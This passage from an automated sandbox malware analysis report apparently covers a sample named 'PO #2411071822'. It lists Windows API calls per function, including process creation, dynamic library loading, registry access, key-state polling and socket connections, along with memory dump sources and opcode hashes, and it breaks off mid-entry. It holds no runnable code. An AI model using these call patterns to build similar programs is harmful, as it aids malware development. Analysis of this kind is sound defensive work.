                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                                              • String ID: %s%d
                                                                                                              • API String ID: 3187004680-1110647743
                                                                                                              • Opcode ID: cdb11bb4910586cf1e9be0761e9305baa2947a7ccbd63324244c9c4be5f0b246
                                                                                                              • Instruction ID: 57574b009a755d5838aefdf9600822a25f5b50ea14cf2db22e235504bc65009f
                                                                                                              • Opcode Fuzzy Hash: cdb11bb4910586cf1e9be0761e9305baa2947a7ccbd63324244c9c4be5f0b246
                                                                                                              • Instruction Fuzzy Hash: 6F1175B1A402097BDB12BF518CC6FE937689F54754F00407BFA08AA182DB789585DB79
                                                                                                              APIs
                                                                                                              • __lock.LIBCMT ref: 00407AD8
                                                                                                                • Part of subcall function 00407CF4: __mtinitlocknum.LIBCMT ref: 00407D06
                                                                                                                • Part of subcall function 00407CF4: EnterCriticalSection.KERNEL32(00000000,?,00407ADD,0000000D), ref: 00407D1F
                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 00407AE5
                                                                                                              • __lock.LIBCMT ref: 00407AF9
                                                                                                              • ___addlocaleref.LIBCMT ref: 00407B17
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                              • String ID: `F
                                                                                                              • API String ID: 1687444384-3520748611
                                                                                                              • Opcode ID: 469f725970f27f7f67a08e1d03f7767eec8f76efaafe6e3fe7df794067467461
                                                                                                              • Instruction ID: f20e864a79c3960506d5e9c6ec80fe9b1ee9d220a6e1508e04155302a5ef5090
                                                                                                              • Opcode Fuzzy Hash: 469f725970f27f7f67a08e1d03f7767eec8f76efaafe6e3fe7df794067467461
                                                                                                              • Instruction Fuzzy Hash: E7015E71904700DED720DF66C90574ABBF0AF50329F20892FA496A62E0DB78B640CB4A
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 0044E33D
                                                                                                              • _memset.LIBCMT ref: 0044E34C
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004A3D00,004A3D44), ref: 0044E37B
                                                                                                              • CloseHandle.KERNEL32 ref: 0044E38D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                                                              • String ID: D=J
                                                                                                              • API String ID: 3277943733-1949506622
                                                                                                              • Opcode ID: e6194e97eca0abc2227e8886355004563642f7f54ecacf82418722c91b2b2eb1
                                                                                                              • Instruction ID: 626050d6b65f4eae53e3c203df50cd55a323ac56ad41d9a88ddee3ceda5f6565
                                                                                                              • Opcode Fuzzy Hash: e6194e97eca0abc2227e8886355004563642f7f54ecacf82418722c91b2b2eb1
                                                                                                              • Instruction Fuzzy Hash: 95F0D0B1640314BAF2106F65AC46F777E5CDB06756F004432FE05E61A2E7799D1046BD
                                                                                                              APIs
                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004419F3
                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00441A26
                                                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00441B49
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00441BBF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2364364464-0
                                                                                                              • Opcode ID: 16f1e0514e2fa364cccd54bbb48dfa0f68eab92aef8ebba5e815150408febfe0
                                                                                                              • Instruction ID: 375af491a8e5f0ab807f3f1fe578ca46d1b6893b93d38bab802a39ca92044680
                                                                                                              • Opcode Fuzzy Hash: 16f1e0514e2fa364cccd54bbb48dfa0f68eab92aef8ebba5e815150408febfe0
                                                                                                              • Instruction Fuzzy Hash: B9815270A00214EBDF119F64C886BAEBBE5EF04710F14845AFA05AF3D2D7B9E9418B95
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0044E1D5
                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0044E20D
                                                                                                              • IsDlgButtonChecked.USER32(?,00000001), ref: 0044E248
                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0044E269
                                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0044E281
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188977179-0
                                                                                                              • Opcode ID: 8dc7cf23289ef7f74a04f7a5366dd8bc14c548c4f617b633078d3c19d6039ebd
                                                                                                              • Instruction ID: 42cc20ffd389e9671a46079718ea138119c518df76bdda6c5b27d40ae48dae5c
                                                                                                              • Opcode Fuzzy Hash: 8dc7cf23289ef7f74a04f7a5366dd8bc14c548c4f617b633078d3c19d6039ebd
                                                                                                              • Instruction Fuzzy Hash: 6F61A334A40214AFEB25CF5AC854FBB77BABF49300F08406AF955973A1C7B9A940CB19
                                                                                                              APIs
                                                                                                              • VariantInit.OLEAUT32(?), ref: 00421CB4
                                                                                                              • VariantClear.OLEAUT32(00000013), ref: 00421D26
                                                                                                              • VariantClear.OLEAUT32(00000000), ref: 00421D81
                                                                                                              • VariantClear.OLEAUT32(?), ref: 00421DF8
                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00421E26
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$Clear$ChangeInitType
                                                                                                              • String ID:
                                                                                                              • API String ID: 4136290138-0
                                                                                                              • Opcode ID: 2292958261dfdb0a106e78ee9430c243b12063d3bfd051f061cfb1f5cce47085
                                                                                                              • Instruction ID: 12a19a4590e0db629b16b14601d4ebf0ff33bc77961ec283e1f5d96ac714cc7f
                                                                                                              • Opcode Fuzzy Hash: 2292958261dfdb0a106e78ee9430c243b12063d3bfd051f061cfb1f5cce47085
                                                                                                              • Instruction Fuzzy Hash: 4E5169B5A00219EFCB14CF58D880AAAB7B9FF5C314B15855AED49DB310E734EA11CFA4
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004406EE
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0044077D
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044079B
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004407E1
                                                                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 004407FB
                                                                                                                • Part of subcall function 003FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0042A574,?,?,00000000,00000008), ref: 003FE675
                                                                                                                • Part of subcall function 003FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0042A574,?,?,00000000,00000008), ref: 003FE699
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 327935632-0
                                                                                                              • Opcode ID: ca92a5cf832c327b59a38207629c0ab407dade9eef55a36c8965456b7f5f0b98
                                                                                                              • Instruction ID: b679b4f5dd40f13ef1bcb5eba25b32979dcd5862a84da179c76ccf41a5be3441
                                                                                                              • Opcode Fuzzy Hash: ca92a5cf832c327b59a38207629c0ab407dade9eef55a36c8965456b7f5f0b98
                                                                                                              • Instruction Fuzzy Hash: 9D519D75A00219DFDB01EFA8C481DADB7B5BF49310B048166EA15AF392DB74ED42CF85
APIs
  • Part of subcall function 00443C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00442BB5,?,?), ref: 00443C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00442EEF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00442F2E
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00442F75
• RegCloseKey.ADVAPI32(?,?), ref: 00442FA1
• RegCloseKey.ADVAPI32(00000000), ref: 00442FAE
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 3740051246-0
• Opcode ID: ed16f4d6592f74a66c59ae9806eb5580d643b85f69b906e4b90ed616ad4bf5f8
• Instruction ID: 9991695cc6b21d81210aed4df53adeb5b14eaf0472cc89664e48c662818eb96d
• Opcode Fuzzy Hash: ed16f4d6592f74a66c59ae9806eb5580d643b85f69b906e4b90ed616ad4bf5f8
• Instruction Fuzzy Hash: A0519A31608244AFD701EF54C981E6FB7F8BF88304F80492EF5959B291DBB4E909DB56
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ed63be30cb5d4b1d5982652d3ad5f1ef851a4b409d65962b90e6c4d39b71e63b
• Instruction ID: 961e2332f3601ead6cf14d46e1f2459b5321e473ced96356f71ccd460a0d05ed
• Opcode Fuzzy Hash: ed63be30cb5d4b1d5982652d3ad5f1ef851a4b409d65962b90e6c4d39b71e63b
• Instruction Fuzzy Hash: 8241E679E02114ABE750DF68CC84FAABF64EB09350F180136F819A72E1D778AD01D659
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004312B4
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004312DD
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0043131C
  • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
  • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00431341
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00431349
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 6668a84aa2676f27c8b260581e4c2453485fa2b0eee89e1fcbef9ad84995598a
• Instruction ID: 20c91f5d6618e716f7d432fc29d0b6100db9cb7bb62c2c8469bf7bc7353c1d3b
• Opcode Fuzzy Hash: 6668a84aa2676f27c8b260581e4c2453485fa2b0eee89e1fcbef9ad84995598a
• Instruction Fuzzy Hash: 2A413C35A00119DFDB01EF65C991AAEBBF5FF08310B1480A9E906AF3A2DB35ED01CB55
APIs
• GetCursorPos.USER32(000000FF), ref: 003FB64F
• ScreenToClient.USER32(00000000,000000FF), ref: 003FB66C
• GetAsyncKeyState.USER32(00000001), ref: 003FB691
• GetAsyncKeyState.USER32(00000002), ref: 003FB69F
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 36002bbc831f88c9439fca78e4fefcaaef1dd4ec48a831542a156d90e68f9e19
• Instruction ID: 9879d4667539b5ba601abed7507ccf1d28092d0cd5118fef62e6b4f0e120da2d
• Opcode Fuzzy Hash: 36002bbc831f88c9439fca78e4fefcaaef1dd4ec48a831542a156d90e68f9e19
• Instruction Fuzzy Hash: FE41AD71A04119FBDF1A8F65C844AE9FBB4FF04325F20431AF82996291CB34A994DF95
APIs
• GetWindowRect.USER32(?,?), ref: 0041B369
• PostMessageW.USER32(?,00000201,00000001), ref: 0041B413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0041B41B
• PostMessageW.USER32(?,00000202,00000000), ref: 0041B429
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0041B431
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 23551be07983cdb195f9c01eb952e4de4cf510b5375e15b1b526a155590c6f72
• Instruction ID: d32fd5581bd8977598f563e815a153eb0f65351e1c6afab1a73f35102f26841e
• Opcode Fuzzy Hash: 23551be07983cdb195f9c01eb952e4de4cf510b5375e15b1b526a155590c6f72
• Instruction Fuzzy Hash: 1931A07190021DEBDF14CF68DD4DADE7BB5EB04319F10822AF921A62D1C3B49954CB95
APIs
• IsWindowVisible.USER32(?), ref: 0041DBD7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0041DBF4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0041DC2C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0041DC52
• _wcsstr.LIBCMT ref: 0041DC5C
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: 5b6be5ec454f8b61528b9ec51633bc5ca93fb41399fa2b8e30b5cce2ccd6c0d8
• Instruction ID: 6333671f9554ea37f6302de8a2208890f96e871fff9f5567a57394aae1909f3b
• Opcode Fuzzy Hash: 5b6be5ec454f8b61528b9ec51633bc5ca93fb41399fa2b8e30b5cce2ccd6c0d8
• Instruction Fuzzy Hash: B32149B1B04104BBEB155F39DC49EBB7BA8DF45710F10403BF909CA191FAA9DC81D2A9
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0041BC90
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0041BCC2
• __itow.LIBCMT ref: 0041BCDA
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0041BD00
• __itow.LIBCMT ref: 0041BD11
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: eb60e2b5f302c06ddb744b6cef5aabdfa1c60a1e0606c51b2498722c1750234b
• Instruction ID: 4922ff7be0f66b5c2bb50e9294e7bd95386c6ed0801c1e78b8bcfc4eb509cb05
• Opcode Fuzzy Hash: eb60e2b5f302c06ddb744b6cef5aabdfa1c60a1e0606c51b2498722c1750234b
• Instruction Fuzzy Hash: 0B21F971B002187BDB11AA66DC46FDF7A68EF5D350F00003AF905EB1C1EB78898587E9
APIs
  • Part of subcall function 003E50E6: _wcsncpy.LIBCMT ref: 003E50FA
• GetFileAttributesW.KERNEL32(?,?,?,?,004260C3), ref: 00426369
• GetLastError.KERNEL32(?,?,?,004260C3), ref: 00426374
• CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004260C3), ref: 00426388
• _wcsrchr.LIBCMT ref: 004263AA
  • Part of subcall function 00426318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004260C3), ref: 004263E0
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
• String ID:
• API String ID: 3633006590-0
• Opcode ID: 339fa4c6cce2da70779bdf04c9bea1a9f97557f4a14cd9248cdfb8cde14fe9f9
• Instruction ID: ab889cc90e9edb166d5eb842acba57c0f9ed9a14c73f1a9aaf884acaca2d0e1c
• Opcode Fuzzy Hash: 339fa4c6cce2da70779bdf04c9bea1a9f97557f4a14cd9248cdfb8cde14fe9f9
• Instruction Fuzzy Hash: D921F631B042254ADB25EA74BC42FFB33ACAF05360F91007BF805D71C0EBA899818A6D
                                                                                                              APIs
                                                                                                                • Part of subcall function 0043A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0043A84E
                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00438BD3
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00438BE2
                                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00438BFE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 3701255441-0
                                                                                                              • Opcode ID: c11a2e00edb802895b82c55fa8f57701ba08b4bb07c7b86a82b640fe49b69ff8
                                                                                                              • Instruction ID: e7064e51471107303ccd7c8cd8be4cff9b9f718528b351f036ab4eaddb737a38
                                                                                                              • Opcode Fuzzy Hash: c11a2e00edb802895b82c55fa8f57701ba08b4bb07c7b86a82b640fe49b69ff8
                                                                                                              • Instruction Fuzzy Hash: 1C21C3317002149FCB14EF28CD85B7EB7A9AF48714F04545EFA169B3D2DBB8AC018766
                                                                                                              APIs
                                                                                                              • IsWindow.USER32(00000000), ref: 00438441
                                                                                                              • GetForegroundWindow.USER32 ref: 00438458
                                                                                                              • GetDC.USER32(00000000), ref: 00438494
                                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 004384A0
                                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 004384DB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 4156661090-0
                                                                                                              • Opcode ID: c0372414f149803f32240315a2fcebb165a44e7264ebc7679dbf5dc7f7f45936
